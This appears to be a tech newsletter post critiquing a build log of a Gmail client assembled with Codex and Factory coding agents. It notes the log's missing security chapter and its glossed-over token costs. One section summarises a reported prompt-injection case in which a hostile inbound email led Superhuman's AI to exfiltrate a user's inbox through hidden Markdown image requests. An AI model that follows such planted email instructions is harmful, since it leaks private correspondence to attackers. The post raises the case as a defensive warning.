Tossell’s Codex-built Gmail client ships agent hooks, skips the injection audit

TL;DR

Ben Tossell rebuilt a Superhuman-style Gmail client almost entirely through Codex and Factory harnesses.
The build added agent-native selectors and debug endpoints matching Google’s accessibility-tree guidance.
The log skips prompt injection, despite Superhuman’s AI being shown to exfiltrate inboxes via hidden Markdown.
Factory’s swarms can burn a monthly token allowance on a single feature, a cost Tossell glosses past.

Today’s tech slot is a single build log with two stories layered inside it. Ben Tossell rebuilt a Superhuman-style Gmail client by orchestrating Codex and Factory harnesses against each other, writing almost none of the code himself — and along the way wired in the hidden selectors and debug endpoints that Google’s own accessibility-tree guidance recommends for agent compatibility. That’s the surface story: a working agent-native email client, vibe-coded.

The other story is what the writeup omits. Superhuman’s AI surface has already been demonstrated exfiltrating inboxes through hidden Markdown, and the new client widens exactly that attack surface without a security chapter to match. The token economics get the same treatment — Factory’s parallel swarms can drain a monthly allowance on one feature, and the post moves past it. The pattern worth flagging is that the harnesses now ship the agent hooks by default; the threat model still has to be added by hand.

Tossell vibe-codes a Gmail client, skips the security chapter

Source: bens-bites · published 2026-05-09

TL;DR

Ben Tossell rebuilt a Superhuman-style Gmail client by toggling Codex and Factory harnesses, with almost no hand-typed code.
He shipped agent-native hooks — hidden selectors and debug endpoints — that line up with Google’s accessibility-tree guidance.
The build log never mentions prompt injection, despite Superhuman’s AI being shown to exfiltrate inboxes via hidden Markdown.
Factory’s swarms can burn a monthly token allowance on one feature, a cost Tossell glosses past.

The build, in one paragraph

Tossell’s third “Ben’s Builds” entry is a working email client that uses Gmail as the source of truth, runs a 20-second Cmd+Z undo-send, and was assembled almost entirely by AI coding harnesses rather than hand-typed code. Codex laid the foundation; Factory took over for UI polish; the author swapped between GPT-5.5 and Claude Opus depending on whether the task wanted obedience or taste. To kill Gmail-API lag he added a local cache, optimistic UI updates, and lazy-loaded “All Mail.” For email rendering — which he calls “a horrible little world” of MIME and tracking pixels — he reverse-engineered the Obsidian web clipper.

The tooling story checks out

The Codex-vs-Factory toggle isn’t just personal preference. Factory’s Droids currently top Terminal-Bench at 63.1%, narrowly ahead of OpenAI’s Codex CLI at 60.4% ¹, so “switch harnesses for different tasks” is a defensible workflow rather than a vibe. The Obsidian-clipper trick is also more substantial than the post implies: under the hood it’s Defuddle, a Readability replacement built around a site-specific Extractor Registry that targets sub-50ms render times ². That’s why the email-body cleanup feels snappy.

The agent-native instincts also land in a real conversation. Google is now telling developers to design for AI agents as a first-class audience, treating the page’s accessibility tree as the canonical machine-readable surface and floating proposals like data-agent-* attributes and .well-known/agent-manifest.json ³. Tossell’s hidden selectors and debug endpoints are an early, ad-hoc version of exactly that pattern.

The chapter that’s missing

A vibe-coded email client touching a live Gmail account is a much higher-stakes artifact than a weekend toy, and the post never reckons with that. In 2024, PromptArmor showed that Superhuman’s own AI could be hijacked by an inbound email and made to exfiltrate the user’s entire inbox through hidden Markdown image requests ⁴. That’s a professionally built product with a security team. A solo developer assembling MIME parsers and reply-all logic from Codex output inherits the same prompt-injection surface with none of the review process — and the post’s stated ethos of “cheap code, delete it if the UX feels wrong” is the wrong reflex for a feature that, if wrong, leaks ten years of correspondence.

There’s a quieter operational gap too. The local-cache fix glosses over the fact that Gmail’s History API only retains roughly seven days of changes; a client offline longer than that has to full-sync from scratch ⁵. Fine for a daily user, ugly for anyone who shuts the laptop for a vacation.

What to take from it

The build log reads as a craft piece; the missing chapter is what happens when an attacker emails the app.

Tossell’s stack choices are vindicated, and his agent-native hooks are arguably ahead of most consumer software. But the practitioner literature on Factory flags one practical caveat — developers report blowing entire monthly token budgets on a single complex feature when the swarm starts iterating ⁶ — and the security literature flags a much bigger one. Both belong in the next post.

Factory.ai Terminal-Bench announcement — https://factory.ai/news/terminal-bench

Factory’s Droids currently hold the top position with a 63.1% success rate, narrowly edging out the OpenAI Codex CLI at 60.4%

↩
Hoangyell — Defuddle explained — https://hoangyell.com/defuddle-explained/

Defuddle is optimized to render pages in under 50 milliseconds by utilizing a site-specific ‘Extractor Registry’ for complex domains

↩
Search Engine Journal — Google guidance on building for agents — https://www.searchenginejournal.com/google-tells-developers-to-build-for-ai-agents-not-just-humans/573587/

a site’s ‘accessibility tree’—originally designed for screen readers—serves as the primary high-fidelity map for AI agents

↩
AtomicMail — Email AI privacy analysis — https://atomicmail.io/blog/what-is-email-ai-convenience-or-privacy-risk?ref=postmake.io

Superhuman’s AI could be manipulated by a malicious incoming email to exfiltrate a user’s entire inbox contents to an external attacker via hidden Markdown image requests

↩
msgvault.io architecture docs — https://www.msgvault.io/architecture/overview/

history records are typically only available for one week; if a client stays offline longer, a full sync must be re-triggered

↩
Matsuoka — Factory AI CodeDroid review — https://hyperdev.matsuoka.com/p/factory-ai-codedroid-promising-concept

developers have reported burning through entire monthly allowances on single, complex features that require multiple iterations to stabilize

↩

Tossell's Codex-built Gmail client ships agent hooks, skips the injection audit

Tossell’s Codex-built Gmail client ships agent hooks, skips the injection audit

TL;DR

Tossell vibe-codes a Gmail client, skips the security chapter

TL;DR

The build, in one paragraph

The tooling story checks out

The chapter that’s missing

What to take from it

Jack Sun, writing.

Tossell’s Codex-built Gmail client ships agent hooks, skips the injection audit

TL;DR

Tossell vibe-codes a Gmail client, skips the security chapter

TL;DR

The build, in one paragraph

The tooling story checks out

The chapter that’s missing

What to take from it

Footnotes

Jack Sun, writing.